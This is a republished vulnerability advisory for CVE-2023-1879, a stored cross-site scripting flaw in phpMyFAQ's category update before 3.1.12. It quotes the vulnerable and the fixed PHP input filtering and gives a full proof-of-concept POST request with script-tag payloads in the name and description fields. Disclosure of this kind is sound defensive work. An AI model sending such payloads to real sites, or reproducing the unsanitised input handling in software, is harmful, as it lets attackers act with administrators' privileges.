Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-1879: Stored XSS @ updatecategory in phpmyfaq

Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

CVE
Open in Source
#xss#csrf#vulnerability#web#mac#git#intel#php#perl#firefox

Description

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Proof of Concept

Code That has a Vulnerability:

            // Updates an existing category
            if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
                $category = new Category($faqConfig, [], false);
                $category->setUser($currentAdminUser);
                $category->setGroups($currentAdminGroups);

                $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
                $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
                $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
                $image = count($uploadedFile) ? $categoryImage->getFileName(
                    $categoryId,
                    $categoryLang
                ) : $existingImage;

                $categoryData = [
                    'id' => $categoryId,
                    'lang' => $categoryLang,
                    'parent_id' => $parentId,
                    'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
                    'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
                    'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                    'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                    'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                    'image' => $image,
                    'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
                ];

Code without that vulnerability:

            // Save a new category
            if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
                $category = new Category($faqConfig, [], false);
                $category->setUser($currentAdminUser);
                $category->setGroups($currentAdminGroups);
                $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
                $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
                $categoryData = [
                    'lang' => $categoryLang,
                    'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
                    'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
                    'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                    'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                    'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                    'image' => $categoryImage->getFileName($categoryId, $categoryLang),
                    'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
                ];

Request:

POST /admin/?action=updatecategory HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
Content-Length: 1934
Origin: https://roy.demo.phpmyfaq.de
Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="id"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="catlang"

en
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="parent_id"

0
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="csrf"

EDITthis
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="existing_image"


-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="name"

<script>alert(1)</script>
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="description"

</textarea><script>alert(2)</script>
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="active"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="show_home"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="user_id"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="grouppermission"

all
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="userpermission"

all
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="restricted_users"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="submit"


-----------------------------14208207025422371582565391486--

Impact

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker’s perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs

Related news

GHSA-m9qm-m5w5-9pgj: thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via updatecategory parameter

thorsten/phpmyfaq prior to 3.1.12 is vulnerable to stored cross-site scripting (XSS) because it fails to sanitize user input in the updatecategory parameter. This has been fixed in 3.1.12.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE